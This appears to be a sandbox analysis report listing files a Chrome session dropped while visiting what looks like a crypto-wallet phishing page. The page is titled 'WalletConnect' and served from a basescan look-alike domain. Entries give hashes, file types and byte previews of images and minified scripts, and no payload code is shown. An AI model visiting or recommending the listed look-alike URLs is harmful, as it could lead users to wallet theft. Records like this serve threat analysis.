                                                                                                                                                                                                                                              SHA-512:2E80EBAC386412C4686FE87A2801932D346F4736DB41D1E076CEB9B902D442A5943300C9291ECA76FC424EA77E5DC9974CF740F60CF9D499A66D7C32BA900FD3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/jss/ace/mode-csharp.js
                                                                                                                                                                                                                                              Preview:define("ace/mode/doc_comment_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=function(){this.$rules={start:[{token:"comment.doc.tag",regex:"@[\\w\\d_]+"},s.getTagRule(),{defaultToken:"comment.doc",caseInsensitive:!0}]}};r.inherits(s,i),s.getTagRule=function(e){return{token:"comment.doc.tag.storage.type",regex:"\\b(?:TODO|FIXME|XXX|HACK)\\b"}},s.getStartRule=function(e){return{token:"comment.doc",regex:"\\/\\*(?=\\*)",next:e}},s.getEndRule=function(e){return{token:"comment.doc",regex:"\\*\\/",next:e}},t.DocCommentHighlightRules=s}),define("ace/mode/csharp_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/doc_comment_highlight_rules","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./doc_comment_highlight_rules").DocCommentHighlightRules,s=e("./text_highlight_rules").TextHighlightRu
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3871
                                                                                                                                                                                                                                              Entropy (8bit):7.90607457623888
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:s+vhON8DyNDTKj5n4Ng05tx7wJFC6xSDD2soN:saV4CbYJoN
                                                                                                                                                                                                                                              MD5:76F47EEF24BE33BF71854F6CC1F9A976
                                                                                                                                                                                                                                              SHA1:2C139217B3FA74A3D071C9C3ECBE70945C50061B
                                                                                                                                                                                                                                              SHA-256:6A0C656460C8ED22C1CA73ED7AB4D0071C66A5D8C609329A451311D91ABA5306
                                                                                                                                                                                                                                              SHA-512:CCDD2B0EB23FAA25E7754140B175D7B13834886533A835C61EAA197F6B86F6EB3F460A61343F142D11E97076F08DB421A6CD7EFF922D67D35D6C5B76ED999CCE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....sRGB.........PLTE.b1w>#.\+....]-..z..}.a3._..`0.W0.W'.....x.......aG..o...~S<...t.a7.]DtJ6...|< ....}P7....T4..j.U%.....c.Z+}R".W+uC)zM5.c<pG5.T@.b2.9.._6.fJvM7zN<.Y)......lE4..cIhB2e?/.tV.hMvH/.eA.X@.YC.1..#.qG/.O..5..).....vX.kO."..........pC).).~1..`;c<+....-..hE.mR....~7.....M.q7 ..pTq?%.U7.{v7..rVg:'k9#.a@.h4y4..\6.jH..v.cC.\2.{k.f<.M..kC..|.qQ.%......pK...q.}.lK.v.xV....b5.[,.+..k<.o`.....W+.^5...3...Y).|Z."..X7.nN....rO.{.uc.pF..s..W3.Y..l.,!.5*.N.l@,.W(..vQ...R#.vf.eW.x...}.#..T$.b6.O..P..f.|].j<.S#.`7.K?.bN.}k..~.ZJ.Q..=2.r.|l..WB.h<.r`.dT.iY.C8.[;.^3..y.n[._O.x.d9.m^.S?.]G.V%.s.c<.td.~a.iV.`4.g?.p.SG.\O...lE.dB.v.A/.z.6%.oJ.g.q.U$.K;.yj.tP.f.{\.?+.]/.I5.hC.dU.xY.d.Y*.VG.K8.kL|A-.qU.p.mI.TC.xY.oF.tU.]N.jR.L0.\......IDAThC...TTu...k!n) ."`..K ......RY...h....*...a..Q.....i..V..X.....4ICI.be].G>...$.r.......{.0.9}..(8.~...s....O.>#G.......=.D....w...)S..3&!!!.7,.b.......te...7n
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):37784
                                                                                                                                                                                                                                              Entropy (8bit):7.989286459311673
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:KTUleukSv6eybvP3x7oP2b2rjJGHjTiuO/nZ3QSVwfFcxFH1z:KYcK6esvPh7oP2b2rjID7O/Z3VEmzz
                                                                                                                                                                                                                                              MD5:7C9A5555B8C4B348997BE44B69805A4D
                                                                                                                                                                                                                                              SHA1:F0C308D74796EDD7B289F567273ABF1F11D6805F
                                                                                                                                                                                                                                              SHA-256:D74275F46E9201500AF2644F9DA4BE28B46A9B9FC4DB234CAD04FCBD981F87DB
                                                                                                                                                                                                                                              SHA-512:BA99FBACA9D276FA7982685D494734177C850C22723327A5E4F9DC51DB369BD5E2A39EB925AC0C92B337189EAB710B3E392D09224ACCF37292ABE6A263620360
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............1^g....sRGB....... .IDATx^.....u.z*t..a6#...H..II.Ee[.e....}.,...m].I....u..~...eEK..H..(..E.. ...`w.....g:U...{fv6. E.2...EOuUuu..N.:.......:....a.....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:....:.....R.....@e......I.q....R.....y.... .`~Pa9"RD(.\...O..$COr. ."PV..z.u`-....B....h:{M._....$.....q.Z...W...|....`3.m..|..Z.6.$.....W.w..7...1.d[ .0.|]."...B..6.+.'....;.W.i.X!!)HA...._..3J8...$...R. !K.R.B.@....(.T..Zg].]..B.P."....S.{7.+..$.X..9`.....a.? ...U.....%..z..tC.A%..uO..P...B. ..z...0.x........Q.CU.......[..J....o!!....g.....L".....Xu!.....a..hB......-.#s..":...&.F.`'..t./..u..$.../.....j.....A...u.......Eo....7..F.8...p.........Z.@29^...x.......q92F|.`.T..o...,Or.....C)~0.E4........4z.A#.....p...`!..(........!<...I.+.G@..S.}..../..W.,.]...L`.$ .a....~..dQ.p....I.!..B....TC @....~.,..,..."dZR..w..GU9.^.T...*.[
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2396
                                                                                                                                                                                                                                              Entropy (8bit):7.891976126994097
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:hzdGUUjb8eNQgp0OACrgL0iu6YUmkCFe2yksKuWUGJ:pdLU/8AQGACME6lmNejGJ
                                                                                                                                                                                                                                              MD5:7B6DCA2B795CCB1B6559812ED0D7EB64
                                                                                                                                                                                                                                              SHA1:2F94C1C046DE8C17AB8CFB5564D334AD810B7F3E
                                                                                                                                                                                                                                              SHA-256:F79E62338EBE81126793691039827F5FB5BECBA6A98B22C29785C15D8DE87C92
                                                                                                                                                                                                                                              SHA-512:89FE246EAAB4ECD5F0F88B4BA4CCA3C58FEEEB32D2E1C8E00F038816362EBC56D211FDB44C5F548D4696E4322918FA556F20E8945AEE16A115C56AFF8D75F099
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/cookie-tVC57MhX.png
                                                                                                                                                                                                                                              Preview:RIFFT...WEBPVP8LG.../(.....m.!0.#... ..E..U..l.IRT..w.....iCQ.IR......C......@...4.....+..e..(..L.._Xhg...q....Pr>.i.bKr.....W.......{.Hr./...6.*...m[m.)........<...I*4K.LK..E.tE..1..7[....9....G..M.m+..i.m....m.m..V.F.........3...^D....L].._j.0..0...;....7.}..}.q....G".....^........-0...-!lt...........?....4W..y. ..N.....;o.(..-.iZ...Z.!|\.C.....u|.W.AH.#.....X.m....R.{.,S...M..R.<..k.F.v..yM.........:..g..u..[.c>Z.iZ3.W.......)...|.....7F.]>f..ZZ'.{...?..;m2.{.5..|eW.4..("...#....7^....7uk..P.nL......0..p~{...O....l..2...?..\`gI@...eV.nW@/D.@I...o..Y.....F.i.<..2.C..)......J...L%..B.....|C...YW{e...8s........-...$....W...`.V.P.f(8O..b..t..S...z.\.f.n....-.H*..(e!.......H.....e..wu.4...&..f...q...!...y ......l..,..Eo..Xbw.%..B..B..a.*g......O.w.i>K$...vT.....:._......3d..6...Xh... ....D...su......s.{......%.V.B*B/..T....4...>.W{........O.l<.6..$......9..Z....=(..u.~.........AhAa...........G.wK1..>....{4...1.L..D.%).k...:.}q.+.8 .g....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1462
                                                                                                                                                                                                                                              Entropy (8bit):6.235456025892314
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Ldkzum8COZNDsLlpGPUc6Ql4kTMyQK7JzXNDqWS2aXVspcRwOKMy:+ZYjwdklfll0xl4OMbK7JpGX++RPKt
                                                                                                                                                                                                                                              MD5:19D0A46044C10C845695233841071E5D
                                                                                                                                                                                                                                              SHA1:7B4EE1D641BE34748C8CB1E749D04602DE25064A
                                                                                                                                                                                                                                              SHA-256:97BA976D1EC62EF9D98B277CC1EB51B80D9020DB2B5F25287940378B95144632
                                                                                                                                                                                                                                              SHA-512:2A8F3C6975B6620C3B6DB2776DC56532B0FEA78E5476F80BF411F8055AD464EBC9E1F377DEFA0B10335147FE7D76FF2A0ACA6644CF11FED8F595B95A4AE68202
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/b5e0fa00d9.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........0@CA.2.......1..+Q..|...-b2..0{...|3..ok......,..<.G.5...k|..7V...]...7E.z.......l(U.g.....J.<...X.yt,hPp..\h.\5=.Im..'m........../.i?.W.1.1.r.03...i.i..A.])Ge...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):804
                                                                                                                                                                                                                                              Entropy (8bit):7.710124054639858
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:6v/7KRfw8vjL+O/gjR+YKgFiAmJU/D2obZsmqooPinPLbKfAhcEFUlaEHZRrmZT5:FRY87LX/4RDFij0C2sm9PLNyf1m81m9
                                                                                                                                                                                                                                              MD5:A564D5F6C69B3210A7F52F98D065500B
                                                                                                                                                                                                                                              SHA1:48B3876F58E508DD1F7A25ADD24B29F84018F2F3
                                                                                                                                                                                                                                              SHA-256:26B96724D0D14EAFE58428ECBCFE62D9A2FE0C1D7CCF46FDFF3BFF4E1BE8108B
                                                                                                                                                                                                                                              SHA-512:C4F028A3647D1DE0C8154547CE482FBCBCD72CE16B265DF0AD776294D1AF60EE24EA20DC3ECEC6BE8BBFF3DD3CF8F0DAFBD865D8E31A2333E65AE5E6E47C52AB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................qiCCPicc..x..;HBQ...Z...j.h..5%DE4.E.$..h5t...{.{...Uh.d5.4.....A.......=H).A.........w%..V.8.F....R,.".=.. ...-.V>.Y..>nq....Y.......K.f.Yp..Lo...@...5....\...+5....q#lF.s...).`..j...O.^M74..5..-....t&......X$H...".....@."L....!.|.".Y2.H.CGF.#..w.Vrr..W..Z.l.m...Z...C........|..3..).{......zO..-.x.....p'..z.]q..U...:.w.-......h.z....1...|...J.r..7s....nIDATx.T.J.1..(...y......W/*z....WY.EOz.O.q....."...A...G....v...<..$/.....)..;.......Gg".....!.a.m!...~A~.,.a..[.ju..."{.a.lbI2&..Y. .2......H.4..Dt...Z......+...MfD.N..M......3.....h....yK.9...6...~.|)/._.O.V.XSw.:..UQ*......D.1......<p.?5.M...69x....P.re.Q.<..\b~..G!..!.\.*..}.?V.x.]..}... }a.@A[_.................s.... z..}..nc........i.O.........IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 388 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):28160
                                                                                                                                                                                                                                              Entropy (8bit):7.850882817105642
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:tFQamrWZxb33+9WnhMswxdOMvjo2e+cGtJlHc:fr3kWys4QM7Lvftjc
                                                                                                                                                                                                                                              MD5:BE240262B3F48FD75FD3814FB62E9E92
                                                                                                                                                                                                                                              SHA1:BB47A2A7FB7D6F6EF3188A24E509B67A743510DE
                                                                                                                                                                                                                                              SHA-256:9983C8C43F2DB0187D7BB6270C8DE276900E0EC2322EBC7FDE4FD19FEBFEF6A1
                                                                                                                                                                                                                                              SHA-512:BD29FD350EF255EFFF61A2945FA3E4DCCA91078A8B3D7A772D7F8205176DF58F71B24B583A602BE180AE4D44AA9EB54F4FDEA0729FAAF130F7126EC5B0EF8561
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/platform-sigma-america-2022-BOnPO8mV.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............*..:....PLTE..p..s..s.~^..f..p..p..h..jnqf..l..a..p..n..r..k..o..h..j..m..`..r..p..o..nhh[..k~z[{vZxsY..o..c..m^bZ...............W_`......|..........r..q..q..h..r..p..r...?FG@GH=BC;DE=AB;DD:@B<CD:BC;AB<EE:BB<AC:BB>EF9?A:AA<CD9?@9AB;BC;AB:AB;CE9?@;BB:DD9@B8=A;BB:AB:BB:AB;BC9AB;BC=BE:AA9@A;CC9?B:BC:AB8@A;BC9AB:BB9@B;AB:AB:AA:AC9@A:AB;BD:@A:BC:AB:AB;@B:BB<AD:@A;CC:BC:BB:AB:AB:AB:AB9@A8??8?@6=>8??5;=6<=4:;4:;BFI..k..n..e..^..l\_V..buqX..nroW..r..s..sY[N..`.z\..g..d..h..h..g..i..j..m..a..q..q..a..j..k..m..q..o..j..o..p{vZmjU..qigS..lfeR..cTWL..f.}]..j..e..b..j..h..lomU..n..f..p..rWZN.._VXL..n..g..`wrX..hRVKtoX.....l.....................rz{.................................`d]......u~.qyz..................jstw........mvw......~.......................*.-l....tRNS...9V..RP'o3.|.`j>MI.....-s>BE._.8~...B..;....+.Dc............... !#$%')+,,.00124579:<>>?@ABCDEFGHIKMNOPRRSUVWXZZ[\]^acea^\YWVTRP#..ZT.<bH.K...Bi[.s}{kyw.J..e.......bT.Z.`.R.t..y...P....HmN..i.Wnq..|.E
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (667)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):668
                                                                                                                                                                                                                                              Entropy (8bit):5.246627624639358
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:EajATrOuA6pCHsPAA9iCXnbOtyd5Kp92vSqjMAIKpj34aDpD:EbTRA6CYAA9RbasScd5j31D
                                                                                                                                                                                                                                              MD5:F77713A42E400D8F889225F376D1C010
                                                                                                                                                                                                                                              SHA1:85AE9759DF6B9EB323DFB00CF119E00413D4B3DF
                                                                                                                                                                                                                                              SHA-256:B7B9BF4BB6A901217CD6878F59A9A651E6A5E1BD6F3CDDBBD891A4D089CD02FA
                                                                                                                                                                                                                                              SHA-512:10F7F0AB46D66B841F38E2EA8C69C5AAB5D0290E90DB14524006B33EAF52CF14D1401D3A87E86828B6CE5DBB164B10E771AB8684EE8F94E3ECC0DA02C5B561AC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{b as s,i as e}from"./isObject-010a5422.js";import{i as f}from"./isObjectLike-e68f0fe0.js";var o="[object Symbol]";function c(r){return typeof r=="symbol"||f(r)&&s(r)==o}var m=/\s/;function b(r){for(var t=r.length;t--&&m.test(r.charAt(t)););return t}var a=/^\s+/;function p(r){return r&&r.slice(0,b(r)+1).replace(a,"")}var n=0/0,y=/^[-+]0x[0-9a-f]+$/i,I=/^0b[01]+$/i,d=/^0o[0-7]+$/i,x=parseInt;function j(r){if(typeof r=="number")return r;if(c(r))return n;if(e(r)){var t=typeof r.valueOf=="function"?r.valueOf():r;r=e(t)?t+"":t}if(typeof r!="string")return r===0?r:+r;r=p(r);var i=I.test(r);return i||d.test(r)?x(r.slice(2),i?2:8):y.test(r)?n:+r}export{j as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9719
                                                                                                                                                                                                                                              Entropy (8bit):7.939518743688771
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:ZfpGYjiGMoZE8i/DcoyLHNESus6OgqxmSVgnNvt7YVf:h5E5DWHyPs6OgqxDcvt7I
                                                                                                                                                                                                                                              MD5:5B9F9DFAAA15CDDE828744CBE115F136
                                                                                                                                                                                                                                              SHA1:F899340D20413508638E17F9CD2B85091E46641A
                                                                                                                                                                                                                                              SHA-256:9B8ABBF4E309EC9E6CC7C587E1A5AA9B4A8EFD39A0325E150808E1D97719AE2D
                                                                                                                                                                                                                                              SHA-512:E36145E7041CBF640FD10607E91CA26A276E8A60345F876B7288DF6CA7FDF547BBAA05271F81A1528B3DEB5F36CD71053426DD2A7D7E93F767AB6118495225EC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............P......PLTEGpL..U..k...O....e....K...M............E{...[..................................................................................y..~....{..r..|..v..i..y..q..s..j..m..t..a..g..k..n..X..d.._..g..b..d..^..X..f..e..Z..^..d..R..c..V..T~.a..T..W..P..P.._..Oy.M..]~.P{.I}.Jt.[z.Ez.Oy.Fp.It.Yv.?w.Cm.Hr.Cl.Rn.En.@i.@hvIc.?f.=ekAZf>Va<R[:NU7IP5EJ3AD0<u).&..._tRNS...@Vc|........................................................................................J.B..#.IDATx......0..`..!P_#...tZ\,..y......:.e[ZX.......#..ab..................o......wm].M.D...d...T.,.....NzDSU..0.......j....3e....KW.....Y}e31..yj..1.9?Z.LGb....#.#.$.'I..Q.GM.D..........'.k.K.zd;..).XV4....y`;....3OuGQ.&.A.[i.c.h.".i.A.1-.Jc.a]..S.B..#..K..f....9.7.u..hN..m.ml..C..w>jZ.....W...d.....<5{oNs......hj..M.....1..T.(..s...55;i8h.(..H..X.w..1Mz.M.......z..[nw..,..Z.|..5.lz._8.:.=......=!D/Y1.8......?..t0.'....+U!z..T.O~e.....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5563)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5564
                                                                                                                                                                                                                                              Entropy (8bit):5.525278571610317
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:zr0yUPBdtsKyqdorqLNdG9kT/vrEjtGfAIvr8YOVzV1oC05TMkJnt9gokUMx4TBX:zYPBdtTyqdWqLK9W/TEjtGfAIT8xh4CW
                                                                                                                                                                                                                                              MD5:834AC674922D570C5AF40C02D527D24C
                                                                                                                                                                                                                                              SHA1:39C1C1EBB9194B2380E3541297915C208DCFFFE9
                                                                                                                                                                                                                                              SHA-256:843FF8E21328C5CECE0D0DA2159CDDC13BF290C583D0A4400F3B66F604CEB268
                                                                                                                                                                                                                                              SHA-512:E2D5CF02E7E3FD5CBF15D12172C29691513889748D9E5C54D3271991EE4145A2F683BEE5F0CF25B2BA28E6D42A8636B335711AD5C4277B4B18A02E5784AD6ADB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var c=(e,n,t)=>new Promise((s,o)=>{var l=i=>{try{a(t.next(i))}catch(d){o(d)}},u=i=>{try{a(t.throw(i))}catch(d){o(d)}},a=i=>i.done?s(i.value):Promise.resolve(i.value).then(l,u);a((t=t.apply(e,n)).next())});import{e as h,b as x,g as m,d as w,P as $,B as S,p as C}from"./manifest-e71017e8.js";import{t as L}from"./toInteger-d3049371.js";import{d as k,c as p,i as r,g as E,t as _}from"./web-170e0195.js";import{t as g,T as U}from"./i18n-78ff9edb.js";var T="Expected a function";function O(e,n){var t;if(typeof n!="function")throw new TypeError(T);return e=L(e),function(){return--e>0&&(t=n.apply(this,arguments)),e<=1&&(n=void 0),t}}function I(e){return O(2,e)}const B="36897522347-1antasd8i7pbd033gmrf2lreff59c754.apps.googleusercontent.com",R=I(()=>x.loadScript("https://accounts.google.com/gsi/client")),K=()=>{const e=document.querySelector(".custom-google-button");if(e)return{click:()=>{e&&e.click()}};const n=document.createElement("div");n.style.display="none",n.classList.add("custom-google-butt
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
